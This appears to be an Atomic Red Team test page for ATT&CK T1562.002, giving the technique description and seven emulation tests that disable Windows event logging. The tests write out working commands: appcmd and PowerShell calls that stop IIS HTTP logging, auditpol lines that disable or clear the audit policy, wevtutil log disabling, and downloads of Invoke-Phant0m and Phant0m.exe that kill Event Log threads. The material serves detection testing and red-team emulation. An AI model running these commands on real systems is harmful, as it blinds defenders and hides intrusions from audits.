T1562.002 - Impair Defenses: Disable Windows Event Logging

Description from ATT&CK

Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more.(Citation: Windows Log Events) This data is used by security tools and analysts to generate detections. The EventLog service maintains event logs from various system components and applications.(Citation: EventLog_Core_Technologies) By default, the service automatically starts when a system powers on. An audit policy, maintained by the Local Security Policy (secpol.msc), defines which system events the EventLog service logs. Security audit policy settings can be changed by running secpol.msc, then navigating to Security Settings\Local Policies\Audit Policy for basic audit policy settings or Security Settings\Advanced Audit Policy Configuration for advanced audit policy settings.(Citation: Audit_Policy_Microsoft)(Citation: Advanced_sec_audit_policy_settings) auditpol.exe may also be used to set audit policies.(Citation: auditpol) Adversaries may target system-wide logging or just that of a particular application. For example, the Windows EventLog service may be disabled using the Set-Service -Name EventLog -Status Stopped or sc config eventlog start=disabled commands (followed by manually stopping the service using Stop-Service -Name EventLog).(Citation: Disable_Win_Event_Logging)(Citation: disable_win_evt_logging) Additionally, the service may be disabled by modifying the “Start” value in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog then restarting the system for the change to take effect.(Citation: disable_win_evt_logging) There are several ways to disable the EventLog service via registry key modification. First, without Administrator privileges, adversaries may modify the "Start" value in the key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Security, then reboot the system to disable the Security EventLog.(Citation: winser19_file_overwrite_bug_twitter) Second, with Administrator privilege, adversaries may modify the same values in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-System and HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Application to disable the entire EventLog.(Citation: disable_win_evt_logging) Additionally, adversaries may use auditpol and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the /success or /failure parameters. For example, auditpol /set /category:”Account Logon” /success:disable /failure:disable turns off auditing for the Account Logon category.(Citation: auditpol.exe_STRONTIC)(Citation: T1562.002_redcanaryco) To clear the audit policy, adversaries may run the following lines: auditpol /clear /y or auditpol /remove /allusers.(Citation: T1562.002_redcanaryco) By disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.

Atomic Tests

Atomic Test #1 - Disable Windows IIS HTTP Logging

Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union). This action requires HTTP logging configurations in IIS to be unlocked.

Use the cleanup commands to restore some default auditpol settings (your original settings will be lost)

Supported Platforms: Windows

auto_generated_guid: 69435dcf-c66f-4ec0-a8b1-82beb76b34db


| Name | Description | Type | Default Value | |——|————-|——|—————| | website_name | The name of the website on a server | string | Default Web Site|

Attack Commands: Run with

C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true

Cleanup Commands:

if(Test-Path "C:\Windows\System32\inetsrv\appcmd.exe"){
  C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false *>$null

Atomic Test #2 - Disable Windows IIS HTTP Logging via PowerShell

Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union). This action requires HTTP logging configurations in IIS to be unlocked.

Use the cleanup commands to restore some default auditpol settings (your original settings will be lost)

Supported Platforms: Windows

auto_generated_guid: a957fb0f-1e85-49b2-a211-413366784b1e


| Name | Description | Type | Default Value | |——|————-|——|—————| | website_name | The name of the website on a server | string | Default Web Site|

Attack Commands: Run with

set-WebConfigurationProperty -PSPath "IIS:\Sites\#{website_name}\" -filter "system.webServer/httpLogging" -name dontLog -value $true

Cleanup Commands:

if(Test-Path "C:\Windows\System32\inetsrv\appcmd.exe"){
  C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false *>$null

Atomic Test #3 - Kill Event Log Service Threads

Kill Windows Event Log Service Threads using Invoke-Phant0m. WARNING you will need to restart PC to return to normal state with Log Service. https://artofpwn.com/phant0m-killing-windows-event-log.html

Supported Platforms: Windows

auto_generated_guid: 41ac52ba-5d5e-40c0-b267-573ed90489bd

Attack Commands: Run with
! Elevation Required (e.g. root or admin)

Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
$url = "https://raw.githubusercontent.com/hlldz/Invoke-Phant0m/f1396c411a867e1b471ef80c5c534466103440e0/Invoke-Phant0m.ps1"
$output = "$env:TEMP\Invoke-Phant0m.ps1"
$wc = New-Object System.Net.WebClient
$wc.DownloadFile($url, $output)
cd $env:TEMP
Import-Module .\Invoke-Phant0m.ps1

Cleanup Commands:

Write-Host "NEED TO Restart-Computer TO ENSURE LOGGING RETURNS" -fore red
Remove-Item "$env:TEMP\Invoke-Phant0m.ps1" -ErrorAction Ignore

Atomic Test #4 - Impair Windows Audit Log Policy

Disables the windows audit policy to prevent key host based telemetry being written into the event logs. Solarigate example

Supported Platforms: Windows

auto_generated_guid: 5102a3a7-e2d7-4129-9e45-f483f2e0eea8

Attack Commands: Run with
! Elevation Required (e.g. root or admin)

auditpol /set /category:"Account Logon" /success:disable /failure:disable
auditpol /set /category:"Logon/Logoff" /success:disable /failure:disable
auditpol /set /category:"Detailed Tracking" /success:disable

Cleanup Commands:

auditpol /set /category:"Account Logon" /success:enable /failure:enable
auditpol /set /category:"Detailed Tracking" /success:enable
auditpol /set /category:"Logon/Logoff" /success:enable /failure:enable

Atomic Test #5 - Clear Windows Audit Policy Config

Clear the Windows audit policy using auditpol utility. This action would stop certain audit events from being recorded in the security log.

Supported Platforms: Windows

auto_generated_guid: 913c0e4e-4b37-4b78-ad0b-90e7b25010f6

Attack Commands: Run with
! Elevation Required (e.g. root or admin)

auditpol /clear /y
auditpol /remove /allusers

Cleanup Commands:

auditpol /set /category:"Account Logon" /success:enable /failure:enable
auditpol /set /category:"Detailed Tracking" /success:enable
auditpol /set /category:"Logon/Logoff" /success:enable /failure:enable

Atomic Test #6 - Disable Event Logging with wevtutil

Wevtutil can be used to disable logs. NOTE: RansomEXX ransomware uses this to disable Security logs post-encryption.

Supported Platforms: Windows

auto_generated_guid: b26a3340-dad7-4360-9176-706269c74103


| Name | Description | Type | Default Value | |——|————-|——|—————| | log_name | Name of the log to be disabled | string | Microsoft-Windows-IKE/Operational|

Attack Commands: Run with

wevtutil sl "#{log_name}" /e:false

Cleanup Commands:

wevtutil sl "#{log_name}" /e:true

Atomic Test #7 - Makes Eventlog blind with Phant0m

Use Phant0m to disable Eventlog

Supported Platforms: Windows

auto_generated_guid: 3ddf3d03-f5d6-462a-ad76-2c5ff7b6d741


| Name | Description | Type | Default Value | |——|————-|——|—————| | file_name | exe version of Phant0m | path | PathToAtomicsFolder\T1562.002\bin\Phant0m.exe|

Attack Commands: Run with


Cleanup Commands:

echo "Sorry you have to reboot"

Dependencies: Run with

Description: Phant0m.exe must exist on disk at specified location (#{file_name})
Check Prereq Commands:
if (Test-Path "#{file_name}") {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory (split-path "#{file_name}") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1562.002/bin/Phant0m.exe" -OutFile "#{file_name}" -UseBasicParsing